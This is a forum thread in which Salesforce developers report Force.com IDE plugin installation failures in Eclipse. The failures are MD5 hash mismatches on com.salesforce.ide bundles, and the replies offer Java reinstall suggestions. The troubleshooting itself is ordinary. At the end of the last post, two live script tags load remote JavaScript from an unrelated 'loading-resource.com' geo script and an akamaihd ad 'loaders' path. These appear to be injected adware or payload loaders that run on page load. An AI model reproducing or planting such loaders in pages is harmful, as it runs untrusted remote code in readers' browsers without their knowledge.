+ Start a Discussion
Chris DaviesChris Davies 

Error Installing Eclipse IDE

A colleague of mine is receiving this error, when he tries to install eclipse on his Windows pc 64 bits.

 

Has anyone come accross this.?

 

Eclipse Error

cnoe26cnoe26

Not sure if these issues are related but I'm getting the following error when trying to upgrade to the latest version of the Force.com IDE:

 

An error occurred while collecting items to be installed

session context was:(profile=epp.package.java, phase=org.eclipse.equinox.internal.p2.engine.phases.Collect, operand=, action=).

Problems downloading artifact: osgi.bundle,com.salesforce.ide.api,24.0.0.201202291629.

MD5 hash is not as expected. Expected: 7251ab037ae632a5a9835c7c07210451 and found f5f4c674fce0ee4e2f84bc9e8dbd3c82.

Problems downloading artifact: osgi.bundle,com.salesforce.ide.documentation,24.0.0.201202291629.

MD5 hash is not as expected. Expected: 6d87eb2e76e7e19f7b709682e5272dfc and found 7d33cec05803d16a88b5db65882c1534.

RovRov

Try downloading the JRE from, and then do the eclipse ide installation

http://www.oracle.com/technetwork/java/javase/downloads/index.html

Chris DaviesChris Davies

Thanks rov, I'm certain he already has JRE otherwise the pluggin would throw a message saying it needs Java to be installed.

achvilaachvila

Fianlly up and running!

 

After a few hours of removing all versions of java off my laptop plus a good registry clean up, re-installation of java, then pulse then eclipse, it has finally worked.

 

Thanks

 

D TillotsonD Tillotson

I am receiving the same errors trying to install the Force.com IDE on Eclipse 3.6.2:

 

An error occurred while collecting items to be installed
session context was:(profile=epp.package.jee, phase=org.eclipse.equinox.internal.p2.engine.phases.Collect, operand=, action=).
Problems downloading artifact: osgi.bundle,com.salesforce.ide.api,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 7251ab037ae632a5a9835c7c07210451 and found 937c6dfa040829b151d028e7f2267abc.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.documentation,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 6d87eb2e76e7e19f7b709682e5272dfc and found 3d9aaf47739e4b9795c3c877cd298475.

 

Any updates?

 

Thanks

pavan.renjalpavan.renjal

I am also getting the following error when trying to install Force.com plugin for my Eclipse Helios 3.6.1 :(:(

 

An error occurred while collecting items to be installed
session context was:(profile=epp.package.java, phase=org.eclipse.equinox.internal.p2.engine.phases.Collect, operand=, action=).
Problems downloading artifact: osgi.bundle,com.salesforce.ide.api,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 7251ab037ae632a5a9835c7c07210451 and found c12ef6845c2b02c713a77db176d1641f.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.documentation,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 6d87eb2e76e7e19f7b709682e5272dfc and found 2e8af133946932d7cf2336a5ff49e225.

 

 

soundararajansgsoundararajansg

I am receiving the same errors trying to install the Force.com IDE on Eclipse 3.6.2: An error occurred while collecting items to be installed session context was:(profile=epp.package.jee, phase=org.eclipse.equinox.internal.p2.engine.phases.Collect, operand=, action=). Problems downloading artifact: osgi.bundle,com.salesforce.ide.api,24.0.0.201202291629. MD5 hash is not as expected. Expected: 7251ab037ae632a5a9835c7c07210451 and found 937c6dfa040829b151d028e7f2267abc. Problems downloading artifact: osgi.bundle,com.salesforce.ide.documentation,24.0.0.201202291629. MD5 hash is not as expected. Expected: 6d87eb2e76e7e19f7b709682e5272dfc and found 3d9aaf47739e4b9795c3c877cd298475.

 

Any Updates !

B GhoshB Ghosh

I am also getting the same error - 

 

An error occurred while collecting items to be installed
session context was:(profile=epp.package.java, phase=org.eclipse.equinox.internal.p2.engine.phases.Collect, operand=, action=).
Problems downloading artifact: osgi.bundle,com.salesforce.ide.api,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 7251ab037ae632a5a9835c7c07210451 and found 970e6d9e4ca7d151b457855f9c54d667.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.core,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 44db36699ca7fdd38917fced4e63c3b3 and found 7f0d773a0e7ac53451650ca077aff073.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.documentation,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 6d87eb2e76e7e19f7b709682e5272dfc and found b006b06be5e4efea2e63bf85a1c0a144.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.ui,24.0.0.201202291629.
MD5 hash is not as expected. Expected: 72451be89c0b7d5ca06b55c8ad657db6 and found 2c33d6dea99a5b0bb976835a22cae134.
Problems downloading artifact: osgi.bundle,com.salesforce.ide.ui.editors,24.0.0.201202291629.
MD5 hash is not as expected. Expected: ff45a840737d9bef14347ce6f5b5daa4 and found 3278642c826bcc691a401548a972a0a9.

 

could anyone help please ?

convex.nareshconvex.naresh

Hello All I am also facing same problem with mine Installation of Force.com IDE in my Eclipse 3.6.2 (Version: Helios Service Release 2. Any Help !, thank you. :)

 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>